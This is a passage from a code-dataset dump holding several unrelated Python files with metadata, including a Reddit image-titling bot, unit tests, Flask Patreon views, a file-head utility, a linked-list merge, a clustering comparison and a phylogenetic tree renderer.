parsed, throw false which will not allow the Bot\r\n # To 
post.\r\n not_parsed = not check_if_parsed(submission.id)\r\n # TODO add gif support\r\n\r\n checks = [not_parsed]\r\n\r\n if not all(checks):\r\n print(\"Checks failed, not submitting\")\r\n return;\r\n\r\n\r\n if url.endswith('.gif') or url.endswith('.gifv'):\r\n # Lets try this again.\r\n try:\r\n return process_gif(submission)\r\n except:\r\n logging.warn(\"gif upload failed\")\r\n return None\r\n # Attempt to grab the images\r\n try:\r\n response = requests.get(url)\r\n img = Image.open(BytesIO(response.content))\r\n except OSError as error:\r\n logging.warning('Converting to image failed, trying with <url>.jpg | %s', error)\r\n try:\r\n response = requests.get(url + '.jpg')\r\n img = Image.open(BytesIO(response.content))\r\n except OSError as error:\r\n logging.error('Converting to image failed, skipping submission | %s', error)\r\n return\r\n except IOError as error:\r\n print('Pillow couldn\\'t process image, marking as parsed and skipping')\r\n return None;\r\n except Exception as error:\r\n print(error)\r\n print('Exception on image conversion lines.')\r\n return None;\r\n try:\r\n image = RedditImage(img)\r\n except Exception as error:\r\n # TODO add error in debug line\r\n print('Could not create RedditImage with error')\r\n return None;\r\n image.add_title(title, False)\r\n\r\n imgur = get_imgur_client_config()\r\n imgur_url = image.upload(imgur)\r\n\r\n return imgur_url\r\n\r\ndef process_gif(submission):\r\n sub = submission.subreddit.display_name\r\n url = submission.url\r\n title = submission.title\r\n author = submission.author.name\r\n \r\n # If its a gifv and hosted on imgur, we're ok, anywhere else I cant verify it works\r\n if 'imgur' in url and url.endswith(\"gifv\"):\r\n # imgur will give us a (however large) gif if we ask for it\r\n # thanks imgur <3\r\n url = url.rstrip('v')\r\n # Reddit Hosted gifs are going to be absolute hell, served via DASH which\r\n # Can be checked through a fallback url :)\r\n try:\r\n response = requests.get(url)\r\n # Try to get an image if someone linked to imgur but didn't put the .file ext.\r\n except OSError as error:\r\n logging.warning('Converting to image failed, trying with <url>.jpg | %s', error)\r\n try:\r\n response = requests.get(url + '.jpg')\r\n img = Image.open(BytesIO(response.content))\r\n # If that wasn't the case\r\n except OSError as error:\r\n logging.error('Converting to image failed, skipping submission | %s', error)\r\n return\r\n # Lord knows\r\n except IOError as error:\r\n print('Pillow couldn\\'t process image, marking as parsed and skipping')\r\n return None;\r\n # The nature of this throws tons of exceptions based on what users throw at the bot\r\n except Exception as error:\r\n print(error)\r\n print('Exception on image conversion lines.')\r\n return None;\r\n except:\r\n logging.error(\"Could not get image from url\")\r\n return None;\r\n \r\n img = Image.open(BytesIO(response.content))\r\n frames = []\r\n \r\n # Process Gif\r\n \r\n # Loop over each frame in the animated image\r\n for frame in ImageSequence.Iterator(img):\r\n # Draw the text on the frame\r\n \r\n # We'll create a custom RedditImage for each frame to avoid\r\n # redundant code\r\n \r\n # TODO: Consolidate this entire method into RedditImage. 
I want to make\r\n # Sure this works before I integrate.\r\n \r\n rFrame = RedditImage(frame)\r\n rFrame.add_title(title, False)\r\n \r\n frame = rFrame._image\r\n # However, 'frame' is still the animated image with many frames\r\n # It has simply been seeked to a later frame\r\n # For our list of frames, we only want the current frame\r\n \r\n # Saving the image without 'save_all' will turn it into a single frame image, and we can then re-open it\r\n # To be efficient, we will save it to a stream, rather than to file\r\n b = BytesIO()\r\n frame.save(b, format=\"GIF\")\r\n frame = Image.open(b)\r\n \r\n # The first successful image generation was 150MB, so lets see what all\r\n # Can be done to not have that happen\r\n \r\n # Then append the single frame image to a list of frames\r\n frames.append(frame)\r\n # Save the frames as a new image\r\n path_gif = 'temp.gif'\r\n path_mp4 = 'temp.mp4'\r\n frames[0].save(path_gif, save_all=True, append_images=frames[1:])\r\n # ff = ffmpy.FFmpeg(inputs={path_gif: None},outputs={path_mp4: None})\r\n # ff.run()\r\n \r\n try:\r\n url = get_gfycat_client_config().upload_file(path_gif).url\r\n remove(path_gif)\r\n except:\r\n logging.error('Gif Upload Failed, Returning')\r\n remove(path_gif)\r\n return None\r\n # remove(path_mp4)\r\n return url\r\n\r\ndef get_gfycat_client_config(config_file=\"config.ini\"):\r\n config = configparser.ConfigParser()\r\n config.read(config_file)\r\n client_id = config['GfyCatAuth']['publicKey']\r\n client_secret = config['GfyCatAuth']['privateKey']\r\n username = config['GfyCatAuth']['username']\r\n password = config['GfyCatAuth']['password']\r\n client = gfycat.GfyCatClient(client_id,client_secret,username,password)\r\n return client\r\n\r\ndef auth_reddit_from_config(config_file='config.ini'):\r\n config = configparser.ConfigParser()\r\n config.read(config_file)\r\n return(praw.Reddit(client_id=config['RedditAuth']['publicKey'],\r\n client_secret=config['RedditAuth']['privateKey'],\r\n username=config['RedditAuth']['username'],\r\n password=config['RedditAuth']['password'],\r\n user_agent=config['RedditAuth']['userAgent']))\r\n\r\n\r\nreddit = auth_reddit_from_config()\r\n\r\ndef get_imgur_client_config(config_file=\"config.ini\"):\r\n config = configparser.ConfigParser()\r\n config.read(config_file)\r\n return(pyimgur.Imgur(config['ImgurAuth']['publicKey']))\r\n\r\n\r\ncomment_file_path = \"parsed.txt\"\r\n\r\ndef add_parsed(id):\r\n with open(comment_file_path, 'a+') as f:\r\n f.write(id)\r\n\r\ndef check_if_parsed(id):\r\n with open(comment_file_path,'r+') as f:\r\n return id in f.read();\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser(description='Bot To Add Titles To Images')\r\n parser.add_argument('-d', '--debug', help='Enable Debug Logging', action='store_true')\r\n parser.add_argument('-l', '--loop', help='Enable Looping Function', action='store_true')\r\n parser.add_argument('limit', help='amount of submissions/messages to process each cycle',\r\n type=int)\r\n parser.add_argument('interval', help='time (in seconds) to wait between cycles', type=int)\r\n\r\n args = parser.parse_args()\r\n if args.debug:\r\n logging.basicConfig(format='%(asctime)s - %(message)s', datefmt='%d-%b-%y %H:%M:%S', level=logging.DEBUG);\r\n else:\r\n logging.basicConfig(format='%(asctime)s - %(message)s', datefmt='%d-%b-%y %H:%M:%S', level=logging.INFO);\r\n\r\n # logging.info('Bot initialized, processing the last %s submissions/messages every %s seconds' % (args.limit, args.interval))\r\n bot = TitleToImageBot()\r\n \r\n \r\n 
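# run a single pass, or keep polling forever when --loop is set\r\n    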
logging.debug('Debug Enabled')\r\n if not args.loop:\r\n bot.run(args.limit)\r\n logging.info('Checking Complete, Exiting Program')\r\n exit(0)\r\n while True:\r\n bot.run(args.limit)\r\n logging.info('Checking Complete')\r\n time.sleep(args.interval)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":21946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"227097174","text":"import os\nimport pytest\n\nfrom maketestsgofaster.cloud.env import Env\nfrom maketestsgofaster.cloud.env.jenkins import Jenkins\n\n\ndef test_create(jenkins_env):\n env = Env.create()\n assert env.name() is 'jenkins'\n assert type(env) is Jenkins\n\n\ndef test_settings(jenkins_env):\n env = Env.create()\n assert env.build_id() == 'build_num'\n assert env.build_url() == 'build_url'\n assert env.build_worker() == 'executor_num'\n assert env.context() == {\n 'JOB_NAME': 'job_name',\n 'NODE_NAME': 'node_name',\n }\n assert env.vcs_branch() == 'branch'\n assert env.vcs_revision() == 'git_commit'\n\n\n@pytest.fixture()\ndef jenkins_env():\n os.environ['BUILD_NUMBER'] = 'build_num'\n os.environ['BUILD_URL'] = 'build_url'\n os.environ['EXECUTOR_NUMBER'] = 'executor_num'\n os.environ['GIT_BRANCH'] = 'branch'\n os.environ['GIT_COMMIT'] = 'git_commit'\n os.environ['JENKINS_URL'] = 'jenkins_url'\n os.environ['JOB_NAME'] = 'job_name'\n os.environ['NODE_NAME'] = 'node_name'\n os.environ['WORKSPACE'] = 'workspace'\n yield\n del os.environ['JENKINS_URL']\n","sub_path":"tests/unit/cloud/env/jenkins_test.py","file_name":"jenkins_test.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"480496796","text":"from flask import Blueprint, request\nfrom flask.ext.mako import render_template\n\nmod = Blueprint('patreon', __name__, url_prefix='/patreon')\nfrom osalt.database import db_session, PatreonModel, Category\nimport hashlib\n\n\n@mod.route('/update')\ndef update_patreon():\n parameters = {'title': 'Validate Patreon', 'relative_location': '..'}\n return render_template('patreon/update.mako', **parameters)\n # return 'updating'\n\n\n@mod.route('/validate')\ndef validate():\n parameters = {'title': 'Validate Patreon', 'relative_location': '..'}\n return render_template('patreon/validate.mako', **parameters)\n\n\ndef __clear_db__():\n all_records = PatreonModel.query.all()\n for record in all_records:\n record.query.delete()\n db_session.commit()\n\n\n@mod.route('/process_csv2', methods=['GET', 'POST'])\ndef upload_file():\n if request.method == 'POST':\n f = request.files['activity_file']\n f.save('/tmp/uploaded_file.txt')\n\n\n@mod.route('/process_csv', methods=['POST'])\ndef store_activity_file_view():\n ##Flush DataBase\n __clear_db__()\n ##\n input_file = request.files.get('activity_file')\n\n # read the file into memory\n my_list = []\n for line in input_file.readlines():\n m = hashlib.md5()\n m.update(line.strip().lower())\n hashed = m.hexdigest()\n patreon = PatreonModel(hash=hashed)\n db_session.add(patreon)\n my_list.append(hashed)\n\n db_session.commit()\n\n parameters = {\n 'title': 'Patreon Processing',\n 'relative_location': '..',\n 'name': '%s patreons loaded into the database' % (len(my_list))\n }\n\n return render_template('generic.mako', **parameters)\n\n\n@mod.route('/check_email', methods=['POST'])\ndef check_email():\n email = request.form.get('email')\n m = hashlib.md5()\n 
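# hash the submitted address the same way the uploaded activity file rows were hashed\n    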
m.update(email)\n    hashed = m.hexdigest()\n    foo = PatreonModel.query.filter_by(hash=hashed).first()\n\n    if foo is not None:\n        message = \"\"\"is a <span style=\"color:blue\"> valid </span> patreon\"\"\"\n    else:\n        message = \"\"\"is an <span style=\"color:red\">invalid </span> patreon\"\"\"\n\n    parameters = {\n        'title': 'Patreon Processing',\n        'relative_location': '..',\n        'name': \"{email} {message}\".format(email=email, message=message)\n    }\n    return render_template('generic.mako', **parameters)\n","sub_path":"osalt/views/patreon.py","file_name":"patreon.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"431191574","text":"# -*- coding:utf-8 -*-\r\n# !/usr/bin/env python3\r\n\r\n\"\"\"\r\nHead\r\n\r\n\r\nUsage:\r\n    head <filename> [-n=<n>] [--encoding=<encoding>] [--output=<output>] [--no-more]\r\n\r\nOptions:\r\n    -n=<n>                 head number of the file [default: 5].\r\n    --encoding=<encoding>  point the encoding of the file manually\r\n    --no-more              don't use `more` to show\r\n\r\n\r\n\"\"\"\r\nimport cchardet as chardet\r\nimport minghu6\r\nfrom docopt import docopt\r\nfrom minghu6.etc import fileecho\r\nfrom color import color\r\nfrom minghu6.text.more import more\r\n\r\n\r\ndef main(path, n, encoding=None, no_more=False):\r\n    try:\r\n        with open(path, 'rb') as f:\r\n            res_list = fileecho.head(f, n)\r\n            res = b'\\n'.join(res_list)\r\n            detect_result = chardet.detect(res)\r\n\r\n            if encoding is not None:\r\n                codec = encoding\r\n            elif detect_result['confidence'] > 0.7:\r\n                codec = detect_result['encoding']\r\n            else:\r\n                color.print_warn('Not Known encoding, may be %s.\\n'\r\n                                 'Please point it explicitly' % detect_result['encoding'])\r\n                return\r\n\r\n            if no_more:\r\n                color.print_info(res.decode(codec, errors='ignore'))\r\n            else:\r\n                more(res.decode(codec, errors='ignore'), print_color=True)\r\n\r\n    except FileNotFoundError:\r\n        color.print_err('%s not found' % path)\r\n    except PermissionError:\r\n        color.print_err('Permission denied: %s' % path)\r\n\r\n\r\ndef cli():\r\n    arguments = docopt(__doc__, version=minghu6.__version__)\r\n\r\n    n = int(arguments['-n'])\r\n    encoding = arguments['--encoding']\r\n    path = arguments['<filename>']\r\n    no_more = arguments['--no-more']\r\n    main(path, n, encoding=encoding, no_more=no_more)\r\n\r\n\r\nif __name__ == '__main__':\r\n    cli()\r\n","sub_path":"minghu6/tools/head.py","file_name":"head.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"535571105","text":"# Divide and conquer: merge the linked lists pairwise until a single list remains\nclass Solution(object):\n\tdef mergeKLists(self, lists):\n\t\tamount = len(lists)\n\t\t# step size\n\t\tinterval = 1\n\t\twhile interval < amount:\n\t\t\t# range(start, end, step) yields an ordered integer sequence\n\t\t\t# starting from 0, merge pairwise: 0,1,2,3,4,5 -> 0,2,4 -> 0,4 -> 0\n\t\t\tfor i in range(0, amount - interval, interval * 2):\n\t\t\t\tlists[i] = self.merge2List(lists[i], lists[i + interval])\n\t\t\tinterval *= 2\n\t\treturn lists[0] if amount > 0 else lists\n\n\tdef merge2List(self, l1, l2):\n\t\t# merge two sorted linked lists\n\t\thead = point = ListNode(0)\n\t\t# compare the values of both lists pairwise to build an ascending list\n\t\twhile l1 and l2:\n\t\t\tif l1.val <= l2.val:\n\t\t\t\tpoint.next = l1\n\t\t\t\tl1 = l1.next\n\t\t\telse:\n\t\t\t\tpoint.next = l2\n\t\t\t\tl2 = l2.next\n\t\t\tpoint = point.next\n\t\t# the lists may differ in length; append the remainder directly to the tail\n\t\tif not l1:\n\t\t\tpoint.next = l2\n\t\telse:\n\t\t\tpoint.next = l1\n\t\treturn head.next\n","sub_path":"Merge k Sorted Lists/DiviveAndConquer.py","file_name":"DiviveAndConquer.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"276911820","text":"import unittest\nimport smtp_client\nimport configparser\n\n\nclass TestSMTPClient(unittest.TestCase):\n    def test_parse_config(self):\n        sender, _ = smtp_client.parse_config('etc/user.conf')\n        self.assertEqual(sender, 'flyingicefr@163.com')\n\n    def test_parse_config_exception(self):\n        with self.assertRaises(OSError):\n            smtp_client.parse_config('etc/nonexist.conf')\n\n        with self.assertRaises(KeyError):\n            smtp_client.parse_config('etc/invalid_key.conf')\n\n        with self.assertRaises(configparser.MissingSectionHeaderError):\n            smtp_client.parse_config('etc/missing_header.conf')\n\n    def test_validate_email(self):\n        smtp_client.validate_email('abc.def@gmail.com')\n\n        with self.assertRaises(ValueError):\n            smtp_client.validate_email('abc')\n            smtp_client.validate_email('@163.com')\n            smtp_client.validate_email('xyz@123@hotmail.com')\n\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"mail-client/smtp_test.py","file_name":"smtp_test.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"96569805","text":"competidores=int(input(\"Enter the number of competitors: \"))\r\nnumero_folhas=int(input(\"Enter the number of sheets bought: \"))\r\nfolha_por_pessoa=int(input(\"Enter the number of sheets for each competitor: \"))\r\nif(competidores>=1 and competidores<=1000 and numero_folhas>=1 and numero_folhas<=1000 and folha_por_pessoa>=1 and folha_por_pessoa<=1000):\r\n\ts=folha_por_pessoa*competidores\r\n\tif(s>numero_folhas):\r\n\t\tprint(\"N\")\r\n\telse:\r\n\t\tprint(\"S\")\r\nelse:\r\n\tprint(\"Invalid number.\")\r\n","sub_path":"estrutura de repeticao/camp3.py","file_name":"camp3.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"200568491","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb  1 09:03:18 2019\n\n@author: Rebeka\n\"\"\"\n\nimport pandas as pd\nfrom sklearn import metrics\n\npopisPutanja = ['test2/poslijeMAX/podaciSOznakomKlastera14.csv', \\\n                'test3/poslijeMAX/podaciSOznakomKlastera11.csv', \\\n                'test4/poslijeMAX/podaciSOznakomKlastera14.csv', \\\n                'test4/poslijeMAX/podaciSOznakomKlastera16.csv',\\\n                'test5/poslijeMAX/podaciSOznakomKlastera16.csv',\\\n                'test5/poslijeMAX/podaciSOznakomKlastera18.csv',\\\n                'test7/prijeMAX/podaciSOznakomKlastera17.csv',\\\n                'test7/poslijeMAX/podaciSOznakomKlastera18.csv']\n \npopisPutanja2 = ['test2/poslijeMAX+temp/podaciSOznakomKlastera10.csv', \\\n                 'test2/poslijeMAX+temp/podaciSOznakomKlastera14.csv', \\\n                 'test2/poslijeMAX+temp/podaciSOznakomKlastera18.csv']\n \npopisPutanja3 = ['test3/poslijeMAX+temp/podaciSOznakomKlastera10.csv', \\\n                 'test3/poslijeMAX+temp/podaciSOznakomKlastera11.csv', \\\n                 'test3/poslijeMAX+temp/podaciSOznakomKlastera16.csv']\n \npopisPutanja4 = ['test4/poslijeMAX+temp/podaciSOznakomKlastera6.csv', \\\n                 'test4/poslijeMAX+temp/podaciSOznakomKlastera14.csv', \\\n                 'test4/poslijeMAX+temp/podaciSOznakomKlastera16.csv', \\\n                 'test4/poslijeMAX+temp/podaciSOznakomKlastera18.csv']\n \npopisPutanja5 = ['test5/poslijeMAX+temp/podaciSOznakomKlastera13.csv', \\\n                 'test5/poslijeMAX+temp/podaciSOznakomKlastera16.csv', \\\n                 'test5/poslijeMAX+temp/podaciSOznakomKlastera18.csv',\\\n                 'test5/poslijeMAX+temp/podaciSOznakomKlastera19.csv']\n \npopisPutanja6 = ['test7/prijeMAX+temp/podaciSOznakomKlastera12.csv', \\\n                 'test7/prijeMAX+temp/podaciSOznakomKlastera15.csv', \\\n                 'test7/prijeMAX+temp/podaciSOznakomKlastera17.csv']\n \npopisPutanja7 = ['test7/poslijeMAX+temp/podaciSOznakomKlastera10.csv', \\\n                 'test7/poslijeMAX+temp/podaciSOznakomKlastera11.csv', \\\n                 'test7/poslijeMAX+temp/podaciSOznakomKlastera15.csv']\n \n\n# pair each base clustering with the group of clusterings it is compared against\ngrupe = [popisPutanja2, popisPutanja3, popisPutanja4, popisPutanja4,\n         popisPutanja5, popisPutanja5, popisPutanja6, popisPutanja7]\n\nfor i in range(len(popisPutanja)):\n    if i > 0:\n        print()\n        print()\n    podaci = pd.read_csv(popisPutanja[i])\n    oznake = podaci.label.values\n    for putanja2 in grupe[i]:\n        print(popisPutanja[i], putanja2)\n        podaci2 = pd.read_csv(putanja2)\n        oznake2 = podaci2.label.values\n        print(metrics.adjusted_mutual_info_score(oznake, oznake2))\n","sub_path":"racunanjeAMI+temp.py","file_name":"racunanjeAMI+temp.py","file_ext":"py","file_size_in_byte":4721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"395241504","text":"# -*- coding: utf-8 -*-\n'''\nDescription of Script\n\nUSAGE:\n    phylo_tree (-h | --help)\n    phylo_tree <filepath_newick> [<alignment_filepath>] --option=<option> (--horizontal|--vertical) [--dummy]\n\nOPTIONS:\n    -h --help  Show this screen.\n    <filepath_newick>  file path of newick format.\n    <filepath_alignment>  draw alignment status in output file.\n    --option:\n        1 : pie\n        2 : alignment\n'''\nfrom docopt import docopt\nif __name__ 
== '__main__':\n arguments = docopt(__doc__)\nfrom pprint import pprint as pp\nfrom ete2 import PhyloTree, TreeStyle, NodeStyle, faces, AttrFace, CircleFace, EvolTree, Tree,PieChartFace\nfrom ete2.treeview.layouts import evol_clean_layout\nimport math\nimport random\nimport sys\nimport re\n\ndef replace_inferred(t):\n \"\"\"\n replace inferred with what has 0 of distance to parent-node\n sample id format that is made by integration is\n sampleid1_sampleid2_sampleid3_....\n \"\"\"\n if t.is_leaf():\n return t\n else:\n names = []\n leaves = []\n trees = []\n for child in t.children:\n if child.is_leaf() and child.dist == 0.0:\n leaves.append(child)\n elif child.dist == 0.0:\n names.append(child.name)\n trees.extend(child.children)\n else:\n trees.append(child)\n trees = map(replace_inferred, trees)\n trees2 = []\n for node in trees:\n if node.is_leaf() and node.dist == 0.0:\n leaves.append(node)\n elif node.dist == 0.0:\n names.append(node.name)\n trees2.extend(node.children)\n else:\n trees2.append(node)\n t.name = \"\"\n for leaf in leaves:\n t.name += leaf.name + \"_\"\n for name in names:\n t.name += name + \"_\"\n #if re.match(r\"_*\", t.name):\n # t.name = \"inferred\"\n t.children = trees2\n return t\n\n\"\"\"\nfunctions for use of base.62 characters\n\"\"\"\ndef _make_use_chars_base_62():\n return [str(i) for i in xrange(0, 10)] + \\\n [chr(i) for i in xrange(ord('a'), ord('z')+1)] + \\\n [chr(i) for i in xrange(ord('A'), ord('Z')+1)]\n\ndef encode_base_62(decimal):\n base_62_str = ''\n use_chars = _make_use_chars_base_62()\n while True:\n base_62_str = use_chars[decimal % 62] + base_62_str\n decimal -= decimal % 62\n decimal /= 62\n if decimal == 0:\n break\n return base_62_str\n\ndef decode_base_62(base_62_str):\n decimal = 0\n use_chars = _make_use_chars_base_62()\n for c in base_62_str:\n decimal *= 62\n decimal += use_chars.index(c)\n return decimal\n\ndef decode_id(_id):\n elms = _id.split(\"-\")\n if not len(elms) == 3:\n return _id\n iso_type = elms[0][0]\n serial_num = decode_base_62(elms[0][1:])\n read_cnt = decode_base_62(elms[1])\n missmatch_cnt = decode_base_62(elms[2])\n return iso_type + str(serial_num) + \"-\" + str(read_cnt) + \"-\" + str(missmatch_cnt)\n\n\ndef decode_tree(t):\n \"\"\"\n all nodes' name (base 62) -> (base 10)\n by Recursion\n\n Args:\n PhyloTree Object\n Returns:\n PhyloTree Object\n \"\"\"\n t.name = decode_id(t.name)\n if t.is_leaf():\n return t\n else:\n t.children = map(decode_tree, t.children)\n return t\n\ndef give_weight(t):\n \"\"\"\n give all node weight\n by Recursion\n\n Args:\n PhyloTree Object\n Returns:\n PhyloTree Object\n \"\"\"\n rand = random.randint(20, 40)\n t.add_feature(\"weight\", rand)\n if t.is_leaf():\n return t\n else:\n t.children = map(give_weight, t.children)\n return t\n\ndef cat_strs(strs, dlm):\n \"\"\"\n Args:\n strs : strings[]\n dlm(delimiter) : character\n Returns:\n string\n \"\"\"\n if len(strs) == 0:\n return \"\"\n else:\n return strs[0] + dlm + cat_strs(strs[1:], dlm)\n\nnuc_arr = [\"A\", \"T\", \"G\", \"C\"]\n\ndef random_alg(n):\n \"\"\"\n create random arry(nuc) whose length is n\n\n Args :\n n\n Returns:\n array(string)\n \"\"\"\n def random_alg_sub(n, arr):\n rand = random.randint(0, 3)\n if n == 0:\n return arr\n else:\n return random_alg_sub(n - 1, arr + nuc_arr[rand])\n return random_alg_sub(n, \"\")\n\ndef make_rand_fasta(t):\n if t.is_leaf():\n rand_arr = random_alg(6)\n print(rand_arr)\n return (\">\" + t.name + \"\\n\" + rand_arr)\n else:\n strs = map(make_rand_fasta, t.children)\n return 
cat_strs(strs, \"\\n\")\n\ndef parse_node_name(node_name):\n \"\"\"\n parse node name and get the parcent of isotype, read_cnt, and\n\n Args:\n node_name\n Returns:\n (IgA cnt, IgG cnt, IgM cnt)\n \"\"\"\n names = node_name.split(\"_\")\n iga_cnt = 0\n igg_cnt = 0\n igm_cnt = 0\n for name in names:\n elms = name.split(\"-\")\n if len(elms) == 0:\n continue\n else:\n if \"A\" in elms[0]:\n iga_cnt += int(elms[1])\n elif \"G\" in elms[0]:\n igg_cnt += int(elms[1])\n elif \"M\" in elms[0]:\n igm_cnt += int(elms[1])\n return iga_cnt, igg_cnt, igm_cnt\n\ndef fine_circle_size(read_cnt):\n \"\"\"\n refine circle size according to the SAMPLE_ID (this is expected by filepath_newick)\n \"\"\"\n \"\"\"\n if \"315T.5212\" in filepath_newick:\n return math.log(read_cnt, 10)\n if \"315T.1131\" in filepath_newick:\n return math.log(read_cnt, 10)\n if \"314T.2136\" in filepath_newick:\n return math.log(read_cnt, 10)\n \"\"\"\n if read_cnt == 0:\n return 0\n\n if \"315T.5018\" in filepath_newick:\n return math.log10(read_cnt) * 5.5\n return math.log10(read_cnt) * 6\n\ndef del_dist(t):\n nodes = t.search_nodes()\n for node in nodes:\n node.del_feature(\"dist\")\n return\n\ndef make_dist_constant(t):\n \"\"\"\n make all nodes' distance constant (for visiblity)\n\n Args:\n PhyloTree Object\n \"\"\"\n nodes = t.search_nodes()\n for node in nodes:\n node.dist = 1\n return\n\ndef make_germline_top(t):\n \"\"\"\n move germline-node to top of tree\n \"\"\"\n germline = t.search_nodes(name=\"germline\")[0]\n germline_parent = germline.up\n germline_parent.remove_child(germline)\n germline.children = [germline_parent]\n return germline\n\ndef add_dummy(t, n):\n \"\"\"\n add dummy to the top whose read count is 'n'\n\n Args:\n PhyloTree Object, dummy's read_cnt\n Returns:\n PhyloTree Object\n \"\"\"\n dummy = PhyloTree()\n dummy.add_feature(\"iga_cnt\", 0)\n dummy.add_feature(\"igg_cnt\", 0)\n dummy.add_feature(\"igm_cnt\", n)\n dummy.add_feature(\"read_cnt\", n)\n dummy.name = \"dummy\"\n dummy.children = [t]\n return dummy\n\n\ndef format_node_name(node):\n node.name = node.name.replace(\"NULL_\", \"\")\n node.name = node.name.replace(\"_\", \"&\")\n node.name = node.name.strip(\"&\")\n ids = node.name.split(\"&\")\n new_ids = []\n for id in ids:\n if len(id.split(\"-\")) != 3:\n new_ids.append(id)\n continue\n new_ids.append(id.split(\"-\")[2])\n node.name = cat_strs(new_ids, \"&\")[0:-1]\n\ndef give_node_color(t):\n nstyle_normal = NodeStyle()\n nstyle_normal[\"shape\"] = \"circle\"\n nstyle_normal[\"size\"] = 6\n nstyle_normal[\"fgcolor\"] = \"Black\"\n nstyle_inferred = NodeStyle()\n nstyle_inferred[\"shape\"] = \"circle\"\n nstyle_inferred[\"size\"] = 6\n nstyle_inferred[\"fgcolor\"] = \"LightGray\"\n for n in t.traverse():\n if n.name == \"\":\n n.set_style(nstyle_inferred)\n else:\n n.set_style(nstyle_normal)\n\ndef add_features(t):\n for node in t.traverse():\n (iga_cnt, igg_cnt, igm_cnt) = parse_node_name(node.name)\n node.add_feature(\"iga_cnt\", iga_cnt)\n node.add_feature(\"igg_cnt\", igg_cnt)\n node.add_feature(\"igm_cnt\", igm_cnt)\n node.add_feature(\"read_cnt\", iga_cnt + igg_cnt + igm_cnt)\n return\n\ndef print_all_features(t):\n for node in t.traverse():\n print(\"name :\" + node.name + \", iga_cnt : \"+ str(node.iga_cnt) + \", igg_cnt : \" + str(node.igg_cnt) +\", igm_cnt : \" + str(node.igm_cnt) + \", read_cnt : \" + str(node.read_cnt))\n\n\ndef layout_circle(node):\n if node.name != \"\":\n faces.add_face_to_node(AttrFace(\"name\"), node, column=0, position=\"branch-right\")\n\n 
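# nodes with no recorded reads have nothing to draw\n    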
if(node.read_cnt == 0):\n return\n\n read_cnts = [node.iga_cnt, node.igg_cnt, node.igm_cnt]\n colors = ['RoyalBlue', 'DarkOrange', 'LimeGreen']\n div = 2.5\n\n Ps = [CircleFace(radius=fine_circle_size(cnt)/div, color=color, style='circle') for cnt, color in\n zip(read_cnts, colors)]\n\n for i, P in enumerate(Ps):\n P.opacity = 0.3\n P.border.width = None\n if arguments['--horizontal']:\n column_index = i\n elif arguments['--vertical']:\n column_index = 0\n faces.add_face_to_node(P, node, column_index, position=\"float\")\n format_node_name(node)\n\ndef layout_pie(node):\n if node.name != \"\":\n faces.add_face_to_node(AttrFace(\"name\"), node, column=0, position=\"branch-right\")\n\n if(node.read_cnt == 0):\n print(\"error\")\n return\n\n (iga_parcent, igg_percent, igm_percent) = (node.iga_cnt * 100.0 / node.read_cnt, node.igg_cnt * 100.0 / node.read_cnt, node.igm_cnt * 100.0 / node.read_cnt)\n\n P = PieChartFace(\n percents=[iga_parcent, igg_percent, igm_percent],\n colors=[\"RoyalBlue\", \"DarkOrange\", \"LimeGreen\"],\n height=fine_circle_size(node.read_cnt),\n width=fine_circle_size(node.read_cnt)\n )\n\n P.opacity = 0.3\n P.border.width = None\n\n faces.add_face_to_node(P, node, 0, position=\"float\")\n format_node_name(node)\n return\n\ndef layout_alg(node):\n # Add node name to laef nodes\n N = AttrFace(\"name\", fsize=20, fgcolor=\"black\")\n (iga_cnt, igg_cnt, igm_cnt) = parse_node_name(node.name)\n print(iga_cnt, igg_cnt, igm_cnt)\n read_cnt = iga_cnt + igg_cnt + igm_cnt\n if \"weight\" in node.features and read_cnt != 0:\n# Creates a sphere face whose size is proportional to node's\n# feature \"weight\"\n (iga_parcent, igg_percent, igm_percent) = (iga_cnt * 100.0 / read_cnt, igg_cnt * 100.0 / read_cnt, igm_cnt * 100.0 / read_cnt)\n P = PieChartFace(percents=[iga_parcent, igg_percent, igm_percent],colors=[\"RoyalBlue\", \"DarkOrange\", \"LimeGreen\"], height=fine_circle_size(read_cnt), width=fine_circle_size(read_cnt))\n# Let's make the sphere transparent\n P.opacity = 0.3\n P.border.width = None\n# And place as a float face over the tree\n faces.add_face_to_node(P, node, 0, position=\"float\")\n\n\"\"\"\nconstance\n\"\"\"\nMIN_SEPARATION = 25\n\ndef draw_tree(\n option,\n filepath_newick,\n filepath_alignment=None,\n dummy=False,\n ):\n if(option == 1):\n ts = TreeStyle()\n ts.layout_fn = layout_circle\n # ts.layout_fn = layout_pie\n ts.allow_face_overlap = False\n ts.show_leaf_name = False\n ts.min_leaf_separation = MIN_SEPARATION\n ts.show_branch_length = False\n ts.show_branch_support = False\n\n t = PhyloTree(filepath_newick, format=1)\n print(filepath_newick)\n print(t.get_ascii(attributes = [\"name\", \"dist\"], show_internal=True))\n\n t = decode_tree(t)\n t = replace_inferred(t)\n t = make_germline_top(t)\n add_features(t)\n if dummy:\n t = add_dummy(t, 100)\n t = add_dummy(t, 1000)\n t = add_dummy(t, 10000)\n#t = give_weight(t)\n give_node_color(t)\n#del_dist(t)\n make_dist_constant(t)\n#alg = make_rand_fasta(t)\n#t.link_to_alignment(alg)\n t.render(filepath_newick.replace(\".newick\", \".png\"), w=3000, tree_style=ts)\n 